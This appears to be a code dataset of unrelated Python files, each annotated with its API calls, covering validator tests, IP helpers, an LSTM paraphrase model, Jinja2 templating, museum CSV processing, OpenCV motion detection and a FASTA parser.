        errs = errors.get("email2")
        self.assertEqual(errs[0], new_message.format(field="e-mail address"))

    def test_custom_values_with_in_rule_expect_new_values(self):
        field = "test"
        new_values = "piet, henk, jan"
        rules = {
            "test": "in:val1,val2,val3"
        }
        input_values = {
            "test": "this.is.not.a.valid.email"
        }
        values = {
            "test": {
                "values": new_values
            }
        }
        self.validator.values = values
        expected = err.IN_ERROR.format(field=field, values=new_values)
        errors = self.validator.validate(input_values, rules)
        errs = errors.get(field)
        self.assertEqual(errs[0], expected)

    def test_custom_fields_with_required_if_rule_expect_new_fields(self):
        new_message = "The {field} field is required when {other} is {value}."
        field = "credit card number"
        other = "payment type"
        value = "credit card"
        rules = {
            "payment_type": "in:crypto,cc,ideal",
            "credit_card_number": "required_if:payment_type,cc"
        }
        input_values = {
            "payment_type": "cc"
        }
        messages = {
            "credit_card_number.required_if": new_message
        }
        fields = {
            "payment_type": other,
            "credit_card_number": field,
            "cc": value
        }
        self.validator.messages = messages
        self.validator.fields = fields
        expected = new_message.format(
            field=field,
            other=other,
            value=value
        )
        errors = self.validator.validate(input_values, rules)
        errs = errors.get("credit_card_number")
        self.assertEqual(errs[0], expected)
| [
"spotlight.errors.IN_ERROR.format",
"spotlight.errors.MIN_STRING_ERROR.format"
] | [((2608, 2658), 'spotlight.errors.MIN_STRING_ERROR.format', 'err.MIN_STRING_ERROR.format', ([], {'field': '"""custom"""', 'min': '(5)'}), "(field='custom', min=5)\n", (2635, 2658), True, 'from spotlight import errors as err\n'), ((4689, 4740), 'spotlight.errors.IN_ERROR.format', 'err.IN_ERROR.format', ([], {'field': 'field', 'values': 'new_values'}), '(field=field, values=new_values)\n', (4708, 4740), True, 'from spotlight import errors as err\n')] |
import socket, struct, six
def in_net(ipint, net):
    #ipaddr = socket.inet_aton(ip)
    netaddr, netmask = net.split('/')
    netaddr = socket.inet_aton(netaddr)
    #ipint = struct.unpack("!I", ipaddr)[0]
    netint = struct.unpack("!I", netaddr)[0]
    maskint = (0xFFFFFFFF << (32 - int(netmask))) & 0xFFFFFFFF
    return ipint & maskint == netint


# http://stackoverflow.com/a/9591005
def ip2int(ip):
    """Convert an IP in dot-decimal notation to int.
    :param ip: string.
    """
    if not isinstance(ip, six.string_types):
        raise ValueError("ip must be str and is {0} instead".format(type(ip)))
    ip = str(ip)
    packedIP = socket.inet_aton(ip)
    return struct.unpack("!I", packedIP)[0]


def int2ip(ip):
    """Convert an IP in an 32bit int to a string in dot-decimal notation.
    :param ip: int
    """
    if not isinstance(ip, int):
        raise ValueError("ip must be int and is {0} instead".format(type(ip)))
    return socket.inet_ntoa(struct.pack('!I', ip))
| [
"struct.unpack",
"socket.inet_aton",
"struct.pack"
] | [((130, 155), 'socket.inet_aton', 'socket.inet_aton', (['netaddr'], {}), '(netaddr)\n', (146, 155), False, 'import socket, struct, six\n'), ((606, 626), 'socket.inet_aton', 'socket.inet_aton', (['ip'], {}), '(ip)\n', (622, 626), False, 'import socket, struct, six\n'), ((208, 236), 'struct.unpack', 'struct.unpack', (['"""!I"""', 'netaddr'], {}), "('!I', netaddr)\n", (221, 236), False, 'import socket, struct, six\n'), ((635, 664), 'struct.unpack', 'struct.unpack', (['"""!I"""', 'packedIP'], {}), "('!I', packedIP)\n", (648, 664), False, 'import socket, struct, six\n'), ((905, 926), 'struct.pack', 'struct.pack', (['"""!I"""', 'ip'], {}), "('!I', ip)\n", (916, 926), False, 'import socket, struct, six\n')] |
from time import time
import pandas as pd
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
import numpy as np
import tensorflow as tf
import argparse
from tensorflow.python.keras.models import Model, Sequential
from tensorflow.python.keras.layers import Input, Embedding, LSTM, GRU, Conv1D, Conv2D, GlobalMaxPool1D, Dense, Dropout
from sklearn.metrics import f1_score, roc_auc_score, accuracy_score
from util import make_w2v_embeddings
from util import split_and_zero_padding
from util import ManDist, generate_confidence_intervals
import os
from keras.backend.tensorflow_backend import set_session
np.random.seed(42)
parser = argparse.ArgumentParser(description='Paraphraser')
parser.add_argument('--gpu', type=int, default=3, metavar='NI', help='gpu id')
parser.add_argument('--filename', type=str, default='train_df.csv' , help='Train File')
args = parser.parse_args()
filename = args.filename
gpuid = args.gpu
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpuid)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
BUILD_EMBED =True
# Make word2vec embeddings
embedding_dim = 300
max_seq_length = 20
def int_pred(preds, thres):
    predsx = preds.copy()
    predsx[predsx>thres] = 1
    predsx[predsx<=thres] = 0
    return predsx
# File paths
TRAIN_CSV = str(filename)
train_file= TRAIN_CSV.split('/')[-1]
print(train_file)
TEST_CSV= './data/quora/test_df.csv'
# Load training set
train_df = pd.read_csv(TRAIN_CSV)
train_size = train_df.shape[0]
# train_df = train_df.iloc[:int(train_size/5.0)]
print(train_df.shape)
test_df = pd.read_csv(TEST_CSV)
print(test_df.shape)
for q in ['question1', 'question2']:
    train_df[q + '_n'] = train_df[q]
    test_df[q + '_n'] = test_df[q]
test_df = test_df[train_df.columns]
use_w2v = True
print('-------------')
# print(train_df.head())
# print(test_df.head())
train_size= train_df.shape[0]
print('train size: {}'.format(train_size))
print('-------------')
if BUILD_EMBED == True:
    full_df = train_df.append(test_df, ignore_index=True)
    full_df, embeddings = make_w2v_embeddings(full_df, embedding_dim=embedding_dim, empty_w2v=not use_w2v)
    print("sentences embedded")
else:
    # full_df= pd.read_csv('./data/full_embeddings_A1.csv')
    # embeddings = np.load('./data/embeddings/embedding_matrix_A1.npy')
    print('embeddings loaded')
train_df = full_df.iloc[:train_size].copy()
test_df = full_df.iloc[train_size:].copy()
print('--------------------------')
# print(train_df.head())
# print(test_df.head())
print('--------------------------')
# test_df, embeddingsx = make_w2v_embeddings(test_df, embedding_dim=embedding_dim, empty_w2v=not use_w2v)
# print("sentences embedded")
# test_df.to_csv('./data/test_embeddings.csv', index= False)
# Split to train validation
validation_size = 0.2
# training_size = len(train_df) - validation_size
X = train_df[['question1_n', 'question2_n']]
Y = train_df['is_duplicate']
X_train, X_validation, Y_train, Y_validation = train_test_split(X, Y, test_size=validation_size, random_state= 42)
X_test = test_df[['question1_n', 'question2_n']]
Y_test = test_df['is_duplicate']
X_train = split_and_zero_padding(X_train, max_seq_length)
X_validation = split_and_zero_padding(X_validation, max_seq_length)
X_test= split_and_zero_padding(X_test, max_seq_length)
# Convert labels to their numpy representations
Y_train = Y_train.values
Y_validation = Y_validation.values
Y_test = Y_test.values
# Make sure everything is ok
assert X_train['left'].shape == X_train['right'].shape
assert len(X_train['left']) == len(Y_train)
# --
# Model variables
gpus = 1
batch_size = 1024 * gpus
n_epoch = 40
n_hidden = 50
# Define the shared model
with tf.device('/gpu:0'):
    set_session(tf.Session(config=config))
    x = Sequential()
    x.add(Embedding(len(embeddings), embedding_dim,
                    weights=[embeddings], input_shape=(max_seq_length,), trainable=False))
    # CNN
    # x.add(Conv1D(250, kernel_size=5, activation='relu'))
    # x.add(GlobalMaxPool1D())
    # x.add(Dense(250, activation='relu'))
    # x.add(Dropout(0.3))
    # x.add(Dense(50, activation='sigmoid'))
    # LSTM
    x.add(LSTM(n_hidden))
    shared_model = x
    # The visible layer
    left_input = Input(shape=(max_seq_length,), dtype='int32')
    right_input = Input(shape=(max_seq_length,), dtype='int32')
    # Pack it all up into a Manhattan Distance model
    malstm_distance = ManDist()([shared_model(left_input), shared_model(right_input)])
    model = Model(inputs=[left_input, right_input], outputs=[malstm_distance])
    model.compile(loss='mean_squared_error', optimizer=tf.keras.optimizers.Adam(), metrics=['accuracy'])
    model.summary()
    shared_model.summary()
############################
# Start training
training_start_time = time()
malstm_trained = model.fit([X_train['left'], X_train['right']], Y_train,
batch_size=batch_size, epochs=3,
validation_data=([X_validation['left'], X_validation['right']], Y_validation))
training_end_time = time()
print('INITIAL SCORES')
print('--------------------------')
preds = model.predict([X_validation['left'], X_validation['right']], batch_size=batch_size )
predsx = preds.copy()
predsx[predsx>0.4] = 1
predsx[predsx<=0.4] = 0
print("DEV F1 Score: {},\t DEV AUC ROC : {},\t DEV ACC: {}".format(f1_score(Y_validation, predsx), roc_auc_score(Y_validation, preds), accuracy_score(Y_validation, predsx) ))
preds = model.predict([X_test['left'], X_test['right']], batch_size=batch_size )
predsx = preds.copy()
predsx[predsx>0.4] = 1
predsx[predsx<=0.4] = 0
print("TEST F1 Score: {},\t TEST AUC ROC : {},\t TEST ACC: {}".format(f1_score(Y_test, predsx), roc_auc_score(Y_test, preds), accuracy_score(Y_test, predsx) ))
######################################
training_start_time = time()
malstm_trained = model.fit([X_train['left'], X_train['right']], Y_train,
batch_size=batch_size, epochs=n_epoch,
validation_data=([X_validation['left'], X_validation['right']], Y_validation))
training_end_time = time()
model.save('./data/SiameseLSTM_epoch25.h5')
print('FINAL SCORES')
print('--------------------------')
preds = model.predict([X_validation['left'], X_validation['right']], batch_size=batch_size )
thres = 0.4
predsx = preds.copy()
predsx[predsx>thres] = 1
predsx[predsx<=thres] = 0
dev_score= "DEV F1 Score: {},\t DEV AUC ROC : {},\t DEV ACC: {}".format(f1_score(Y_validation, predsx), roc_auc_score(Y_validation, preds), accuracy_score(Y_validation, predsx) )
print(dev_score)
preds = model.predict([X_test['left'], X_test['right']], batch_size=batch_size )
predsx = preds.copy()
predsx[predsx>thres] = 1
predsx[predsx<=thres] = 0
test_score= "TEST F1 Score: {},\t TEST AUC ROC : {},\t TEST ACC: {}".format(f1_score(Y_test, predsx), roc_auc_score(Y_test, preds), accuracy_score(Y_test, predsx) )
print(test_score)
acc_scores =[]
thr = 0.4
acc_scores.append(accuracy_score(Y_test, int_pred(preds, thr)))
sv_scores = "ACC SCORES : {}".format(str(acc_scores))
print(sv_scores)
final_preds = np.array(list(zip(Y_test, preds, predsx)))
np.save('./data/preds/predsLSTM_'+str(train_file)+ '.npy', final_preds)
print('--------------------------')
print("Training time finished.\n%d epochs in %12.2f" % (n_epoch, training_end_time - training_start_time))
fo = open('./data/scores_lstm/scoresLSTM_'+str(train_file)+ '.txt', 'w')
fo.write(train_file+'\n')
fo.write('-----------\n')
fo.write(sv_scores+'\n')
fo.write('-----------\n')
fo.write(test_score+'\n')
fo.close()
print(str(malstm_trained.history['val_acc'][-1])[:6] + "(max: " + str(max(malstm_trained.history['val_acc']))[:6] + ")")
print("Done.")
print(train_df.shape)
print(train_file)
| [
"util.ManDist",
"pandas.read_csv",
"sklearn.metrics.roc_auc_score",
"tensorflow.python.keras.layers.Input",
"argparse.ArgumentParser",
"tensorflow.python.keras.models.Model",
"tensorflow.Session",
"util.split_and_zero_padding",
"numpy.random.seed",
"tensorflow.ConfigProto",
"tensorflow.python.keras.models.Sequential",
"tensorflow.python.keras.layers.LSTM",
"tensorflow.device",
"matplotlib.use",
"sklearn.model_selection.train_test_split",
"time.time",
"sklearn.metrics.accuracy_score",
"sklearn.metrics.f1_score",
"tensorflow.keras.optimizers.Adam",
"util.make_w2v_embeddings"
] | [((60, 81), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (74, 81), False, 'import matplotlib\n'), ((676, 694), 'numpy.random.seed', 'np.random.seed', (['(42)'], {}), '(42)\n', (690, 694), True, 'import numpy as np\n'), ((705, 755), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Paraphraser"""'}), "(description='Paraphraser')\n", (728, 755), False, 'import argparse\n'), ((1051, 1067), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {}), '()\n', (1065, 1067), True, 'import tensorflow as tf\n'), ((1476, 1498), 'pandas.read_csv', 'pd.read_csv', (['TRAIN_CSV'], {}), '(TRAIN_CSV)\n', (1487, 1498), True, 'import pandas as pd\n'), ((1611, 1632), 'pandas.read_csv', 'pd.read_csv', (['TEST_CSV'], {}), '(TEST_CSV)\n', (1622, 1632), True, 'import pandas as pd\n'), ((2980, 3046), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'Y'], {'test_size': 'validation_size', 'random_state': '(42)'}), '(X, Y, test_size=validation_size, random_state=42)\n', (2996, 3046), False, 'from sklearn.model_selection import train_test_split\n'), ((3142, 3189), 'util.split_and_zero_padding', 'split_and_zero_padding', (['X_train', 'max_seq_length'], {}), '(X_train, max_seq_length)\n', (3164, 3189), False, 'from util import split_and_zero_padding\n'), ((3205, 3257), 'util.split_and_zero_padding', 'split_and_zero_padding', (['X_validation', 'max_seq_length'], {}), '(X_validation, max_seq_length)\n', (3227, 3257), False, 'from util import split_and_zero_padding\n'), ((3266, 3312), 'util.split_and_zero_padding', 'split_and_zero_padding', (['X_test', 'max_seq_length'], {}), '(X_test, max_seq_length)\n', (3288, 3312), False, 'from util import split_and_zero_padding\n'), ((2080, 2165), 'util.make_w2v_embeddings', 'make_w2v_embeddings', (['full_df'], {'embedding_dim': 'embedding_dim', 'empty_w2v': '(not use_w2v)'}), '(full_df, embedding_dim=embedding_dim, empty_w2v=not use_w2v\n )\n', (2099, 2165), False, 'from util import make_w2v_embeddings\n'), ((3692, 3711), 'tensorflow.device', 'tf.device', (['"""/gpu:0"""'], {}), "('/gpu:0')\n", (3701, 3711), True, 'import tensorflow as tf\n'), ((3758, 3770), 'tensorflow.python.keras.models.Sequential', 'Sequential', ([], {}), '()\n', (3768, 3770), False, 'from tensorflow.python.keras.models import Model, Sequential\n'), ((4178, 4223), 'tensorflow.python.keras.layers.Input', 'Input', ([], {'shape': '(max_seq_length,)', 'dtype': '"""int32"""'}), "(shape=(max_seq_length,), dtype='int32')\n", (4183, 4223), False, 'from tensorflow.python.keras.layers import Input, Embedding, LSTM, GRU, Conv1D, Conv2D, GlobalMaxPool1D, Dense, Dropout\n'), ((4239, 4284), 'tensorflow.python.keras.layers.Input', 'Input', ([], {'shape': '(max_seq_length,)', 'dtype': '"""int32"""'}), "(shape=(max_seq_length,), dtype='int32')\n", (4244, 4284), False, 'from tensorflow.python.keras.layers import Input, Embedding, LSTM, GRU, Conv1D, Conv2D, GlobalMaxPool1D, Dense, Dropout\n'), ((4429, 4495), 'tensorflow.python.keras.models.Model', 'Model', ([], {'inputs': '[left_input, right_input]', 'outputs': '[malstm_distance]'}), '(inputs=[left_input, right_input], outputs=[malstm_distance])\n', (4434, 4495), False, 'from tensorflow.python.keras.models import Model, Sequential\n'), ((4712, 4718), 'time.time', 'time', ([], {}), '()\n', (4716, 4718), False, 'from time import time\n'), ((4946, 4952), 'time.time', 'time', ([], {}), '()\n', (4950, 4952), False, 'from time import time\n'), ((5741, 5747), 'time.time', 'time', ([], {}), '()\n', (5745, 5747), 
False, 'from time import time\n'), ((5981, 5987), 'time.time', 'time', ([], {}), '()\n', (5985, 5987), False, 'from time import time\n'), ((3726, 3751), 'tensorflow.Session', 'tf.Session', ([], {'config': 'config'}), '(config=config)\n', (3736, 3751), True, 'import tensorflow as tf\n'), ((4107, 4121), 'tensorflow.python.keras.layers.LSTM', 'LSTM', (['n_hidden'], {}), '(n_hidden)\n', (4111, 4121), False, 'from tensorflow.python.keras.layers import Input, Embedding, LSTM, GRU, Conv1D, Conv2D, GlobalMaxPool1D, Dense, Dropout\n'), ((4355, 4364), 'util.ManDist', 'ManDist', ([], {}), '()\n', (4362, 4364), False, 'from util import ManDist, generate_confidence_intervals\n'), ((6351, 6381), 'sklearn.metrics.f1_score', 'f1_score', (['Y_validation', 'predsx'], {}), '(Y_validation, predsx)\n', (6359, 6381), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((6383, 6417), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['Y_validation', 'preds'], {}), '(Y_validation, preds)\n', (6396, 6417), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((6419, 6455), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['Y_validation', 'predsx'], {}), '(Y_validation, predsx)\n', (6433, 6455), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((6713, 6737), 'sklearn.metrics.f1_score', 'f1_score', (['Y_test', 'predsx'], {}), '(Y_test, predsx)\n', (6721, 6737), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((6739, 6767), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['Y_test', 'preds'], {}), '(Y_test, preds)\n', (6752, 6767), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((6769, 6799), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['Y_test', 'predsx'], {}), '(Y_test, predsx)\n', (6783, 6799), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((4549, 4575), 'tensorflow.keras.optimizers.Adam', 'tf.keras.optimizers.Adam', ([], {}), '()\n', (4573, 4575), True, 'import tensorflow as tf\n'), ((5251, 5281), 'sklearn.metrics.f1_score', 'f1_score', (['Y_validation', 'predsx'], {}), '(Y_validation, predsx)\n', (5259, 5281), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((5283, 5317), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['Y_validation', 'preds'], {}), '(Y_validation, preds)\n', (5296, 5317), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((5319, 5355), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['Y_validation', 'predsx'], {}), '(Y_validation, predsx)\n', (5333, 5355), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((5587, 5611), 'sklearn.metrics.f1_score', 'f1_score', (['Y_test', 'predsx'], {}), '(Y_test, predsx)\n', (5595, 5611), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((5613, 5641), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['Y_test', 'preds'], {}), '(Y_test, preds)\n', (5626, 5641), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((5643, 5673), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['Y_test', 'predsx'], {}), '(Y_test, predsx)\n', (5657, 5673), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n')] |
from __future__ import absolute_import
from django.conf import settings
import jinja2
from ..contextutil import context_to_dict
class Jinja2Template(object):
    def __init__(self, template_obj):
        self.template_obj=template_obj

    def render(self, context):
        return self.template_obj.render(context_to_dict(context))


def get_template_from_string(source, origin=None, name=None):
    opts=getattr(settings, 'JINJA2_TEMPLATE_OPTS', {})
    if opts:
        opts=opts.copy()
    if not 'loader' in opts:
        opts['loader']=jinja2.FileSystemLoader(settings.JINJA2_TEMPLATE_DIRS)
    environment=jinja2.Environment(**opts)
    template=environment.from_string(source)
    template.name=name
    return Jinja2Template(template)
| [
"jinja2.FileSystemLoader",
"jinja2.Environment"
] | [((627, 653), 'jinja2.Environment', 'jinja2.Environment', ([], {}), '(**opts)\n', (645, 653), False, 'import jinja2\n'), ((555, 609), 'jinja2.FileSystemLoader', 'jinja2.FileSystemLoader', (['settings.JINJA2_TEMPLATE_DIRS'], {}), '(settings.JINJA2_TEMPLATE_DIRS)\n', (578, 609), False, 'import jinja2\n')] |
#importing csv & json module
import csv
import json
# csv file name
inp_filename = "MetObjects.csv"
out_filename1 = "Uniqueyearnode.csv"
out_filename2 = "Uniqueyearedge.csv"
out_filename3 = "uniqueyear-met.csv"
#initializing the titles and rows list
Artist_Nationality = "American"
Unique_year = []
#----------------------- v lookup and create unique id
year_id_lookup = {}
unique_year_id_number = 2013
#----------------------- output list
museumname1 = "MET"
museumid = "1"
typemet = "Directed"
Weightmet = "1"
# read data from csv
with open(inp_filename, 'r') as in_Met:
    reader = csv.DictReader(in_Met)
    ## CSV is open and reading ready
    for row in reader:
        artistcol = row['Artist Display Name']
        year = row['Object Begin Date']
        Object = row['Title']
        if 'Modern and Contemporary Art' in row['Department'] and Artist_Nationality in row['Artist Nationality']:
            if row['Object Begin Date'] not in Unique_year:
                Unique_year.append(row['Object Begin Date'])
                year_id_lookup[row['Object Begin Date']] = unique_year_id_number
                unique_year_id_number = unique_year_id_number + 1

# output yearnode
with open(out_filename1, 'w') as out_MET1:
    writer = csv.writer(out_MET1)
    writer.writerow(['Label2', 'id', 'node'])
    for uniyear in Unique_year:
        writer.writerow([uniyear, year_id_lookup[uniyear], year_id_lookup[uniyear]])

# output year and met edge
with open(out_filename2, 'w') as out_MET2:
    writer = csv.writer(out_MET2)
    writer.writerow(['Label', 'Museum', 'source', 'target', 'Type', 'Weight'])
    for uniyear in Unique_year:
        writer.writerow([uniyear, museumname1, museumid, year_id_lookup[uniyear], typemet, Weightmet])

# output yearnode
with open(out_filename3, 'w') as out_MET3:
    writer = csv.writer(out_MET3)
    writer.writerow(['Label2'])
    for uniyear in Unique_year:
        writer.writerow([uniyear, museumname1])
#row['Department'], row['Title'],row['Artist Display Name'], row['Object Begin Date'],row['Medium'], row['Dimensions']
# if row['Artist Display Name'] not in Artsit:
# Artsit.append(row['Artist Display Name']) | [
"csv.writer",
"csv.DictReader"
] | [((591, 613), 'csv.DictReader', 'csv.DictReader', (['in_Met'], {}), '(in_Met)\n', (605, 613), False, 'import csv\n'), ((1259, 1279), 'csv.writer', 'csv.writer', (['out_MET1'], {}), '(out_MET1)\n', (1269, 1279), False, 'import csv\n'), ((1548, 1568), 'csv.writer', 'csv.writer', (['out_MET2'], {}), '(out_MET2)\n', (1558, 1568), False, 'import csv\n'), ((1848, 1868), 'csv.writer', 'csv.writer', (['out_MET3'], {}), '(out_MET3)\n', (1858, 1868), False, 'import csv\n')] |
import cv2
import time
import argparse
#importing the necessary libraries
cv2.ocl.setUseOpenCL(False)
#disabling opencl because it causes an error to do with the background subtraction
ap = argparse.ArgumentParser()
ap.add_argument("-a", "--min-area", type=int, default=200, help="minimum area")
args = vars(ap.parse_args())
#argument parser with minimum area for it to pick up as motion
cap = cv2.VideoCapture(0)
#getting the video out from the webcam
fgbg = cv2.createBackgroundSubtractorMOG2()
#getting the background subtractor ready for use
while (1):
    ret, frame = cap.read()
    #starting the loop while reading from the video capture
    fgmask = fgbg.apply(frame)
    #applying the background subtractor
    thresh = fgmask
    thresh = cv2.GaussianBlur(thresh, (21, 21), 0)
    thresh = cv2.threshold(thresh, 127, 255, cv2.THRESH_BINARY)[1]
    thresh = cv2.dilate(thresh, None, iterations=1)
    #making the image binary and adjusting it for the contouring
    _, cnts, _ = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    #find the contours around the edges of the motion
    for c in cnts:
        if cv2.contourArea(c) < args["min_area"]:
            continue
        #putting the contour area through the argument parser for minimum area
        c = max(cnts, key=cv2.contourArea)
        (x, y, w, h) = cv2.boundingRect(c)
        cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)
        #draw the rectangle around the object
    cv2.imshow("Feed", frame)
    #show the image in a new window
    key = cv2.waitKey(1) & 0xFF
    if key == ord("s"):
        break
#break the loop
cap.release()
cv2.destroyAllWindows()
#stop the windows
| [
"cv2.ocl.setUseOpenCL",
"cv2.createBackgroundSubtractorMOG2",
"cv2.rectangle",
"argparse.ArgumentParser",
"cv2.threshold",
"cv2.imshow",
"cv2.contourArea",
"cv2.destroyAllWindows",
"cv2.VideoCapture",
"cv2.dilate",
"cv2.GaussianBlur",
"cv2.waitKey",
"cv2.boundingRect"
] | [((77, 104), 'cv2.ocl.setUseOpenCL', 'cv2.ocl.setUseOpenCL', (['(False)'], {}), '(False)\n', (97, 104), False, 'import cv2\n'), ((196, 221), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (219, 221), False, 'import argparse\n'), ((402, 421), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (418, 421), False, 'import cv2\n'), ((469, 505), 'cv2.createBackgroundSubtractorMOG2', 'cv2.createBackgroundSubtractorMOG2', ([], {}), '()\n', (503, 505), False, 'import cv2\n'), ((1680, 1703), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1701, 1703), False, 'import cv2\n'), ((769, 806), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['thresh', '(21, 21)', '(0)'], {}), '(thresh, (21, 21), 0)\n', (785, 806), False, 'import cv2\n'), ((887, 925), 'cv2.dilate', 'cv2.dilate', (['thresh', 'None'], {'iterations': '(1)'}), '(thresh, None, iterations=1)\n', (897, 925), False, 'import cv2\n'), ((1513, 1538), 'cv2.imshow', 'cv2.imshow', (['"""Feed"""', 'frame'], {}), "('Feed', frame)\n", (1523, 1538), False, 'import cv2\n'), ((820, 870), 'cv2.threshold', 'cv2.threshold', (['thresh', '(127)', '(255)', 'cv2.THRESH_BINARY'], {}), '(thresh, 127, 255, cv2.THRESH_BINARY)\n', (833, 870), False, 'import cv2\n'), ((1374, 1393), 'cv2.boundingRect', 'cv2.boundingRect', (['c'], {}), '(c)\n', (1390, 1393), False, 'import cv2\n'), ((1402, 1462), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(x, y)', '(x + w, y + h)', '(0, 0, 255)', '(2)'], {}), '(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)\n', (1415, 1462), False, 'import cv2\n'), ((1585, 1599), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (1596, 1599), False, 'import cv2\n'), ((1167, 1185), 'cv2.contourArea', 'cv2.contourArea', (['c'], {}), '(c)\n', (1182, 1185), False, 'import cv2\n')] |
from webtest import TestApp
# from boddle import boddle
import kafka_selfservice
# def test_webapp_index():
# with boddle(params={'name': 'Derek'}):
# assert kafka_selfservice.index() == 'Hi Derek!'
def test_webapp_ping():
app = TestApp(kafka_selfservice.app)
assert app.get('/v1/ping').status == '200 OK'
| [
"webtest.TestApp"
] | [((239, 269), 'webtest.TestApp', 'TestApp', (['kafka_selfservice.app'], {}), '(kafka_selfservice.app)\n', (246, 269), False, 'from webtest import TestApp\n')] |
#! /usr/bin/python3
import random
# fasta_chars = "ANDRCGQEHILKMFPSTYWV"
codec = {
"A": (0, 0, 0, 0, 0),
"N": (0, 0, 0, 0, 1),
"D": (0, 0, 0, 1, 0),
"R": (0, 0, 0, 1, 1),
"C": (0, 0, 1, 0, 0),
"G": (0, 0, 1, 0, 1),
"Q": (0, 0, 1, 1, 0),
"E": (0, 0, 1, 1, 1),
"H": (0, 1, 0, 0, 0),
"I": (0, 1, 0, 0, 1),
"L": (0, 1, 0, 1, 0),
"K": (0, 1, 0, 1, 1),
"M": (0, 1, 1, 0, 0),
"F": (0, 1, 1, 0, 1),
"P": (0, 1, 1, 1, 0),
"S": (0, 1, 1, 1, 1),
"T": (1, 0, 0, 0, 0),
"Y": (1, 0, 0, 1, 0),
"W": (1, 0, 0, 0, 1),
"V": (1, 0, 0, 1, 1)
}
def get_fchar_for_code(code):
for fc in codec:
if codec[fc] == code:
return fc
return None
def get_fstr_for_codes(codeseq):
if len(codeseq) % 5 != 0:
raise Exception("codeseq must be a multiple of code width (which is 5)")
res = list()
for i in range(len(codeseq) // 5):
cur_code = tuple( codeseq[i * 5 : (i+1) * 5] )
cur_fchar = get_fchar_for_code(cur_code)
if cur_fchar is not None:
res.append(cur_fchar)
else:
res.append("-")
return "".join(res)
#class _FastaCodeIterator:
# def __init__(self, fasta_string, window):
# if len(fasta_string) < window:
# raise Exception("fasta_string must be long enough to form at least 1 window")
#
# self.fasta_string = fasta_string
# self.window = window
#
# self.i = 0
#
# def __next__(self):
# if self.i > len(self.fasta_string) - self.window:
# raise StopIteration
#
# code = list()
# for w in range(self.window):
# c = self.fasta_string[self.i + w]
# if c not in codec:
# raise Exception("fasta string contained character not in codec")
#
# for num in codec[c]:
# code.append(num)
#
# self.i += 1
#
# return code
def get_code_iterator(fasta_string, window):
for i in range( (len(fasta_string) - window) + 1):
res = list()
for w in range(window):
c = fasta_string[i + w]
if c not in codec:
raise Exception("non-FASTA character in fasta string")
for e in codec[c]:
res.append(e)
yield res
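# A minimal usage sketch of the codec helpers above; the sequence "ANDR" and the window of 2
# are arbitrary illustrative choices, not values used anywhere else in this module.
def _demo_codec_roundtrip():
    sample = "ANDR"
    for code in get_code_iterator(sample, 2):
        # each window of 2 residues becomes 10 bits; decoding them back is a sanity check
        print(code, "->", get_fstr_for_codes(code))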
class FastaParser:
def __init__(self):
self.records = []
def add_from_stream(self, fstream):
last_record = ""
for line in fstream:
            line = line.strip()
if len(line) < 1:
continue
if line[0] == '>' or line[0] == ';':
# store record if there is one
if len(last_record) > 0:
self.records.append( last_record )
last_record = ""
continue
for char in line:
if char in codec:
last_record += char
if len(last_record) > 0:
self.records.append( last_record )
def add_from_file(self, filename):
with open(filename, "r") as ifile:
self.add_from_stream(ifile)
def clear(self):
self.records.clear()
# def get_fasta_iterator(self, window):
# fstring = random.choice(self.records)
#
# return _FastaCodeIterator(fstring, window)
def get_random_record(self):
return random.choice(self.records)
def get_iter_for_random_record(self, window):
return get_code_iterator(random.choice(self.records), window)
| [
"random.choice"
] | [((3361, 3388), 'random.choice', 'random.choice', (['self.records'], {}), '(self.records)\n', (3374, 3388), False, 'import random\n'), ((3473, 3500), 'random.choice', 'random.choice', (['self.records'], {}), '(self.records)\n', (3486, 3500), False, 'import random\n')] |
import unittest
from uuid import (
uuid4,
)
from tests.utils import (
Product,
)
class TestExternalEntity(unittest.TestCase):
def test_values(self):
uuid = uuid4()
product = Product(uuid, 3, "apple", 3028)
self.assertEqual(uuid, product.uuid)
self.assertEqual(3, product.version)
self.assertEqual("apple", product.title)
self.assertEqual(3028, product.quantity)
if __name__ == "__main__":
unittest.main()
| [
"unittest.main",
"tests.utils.Product",
"uuid.uuid4"
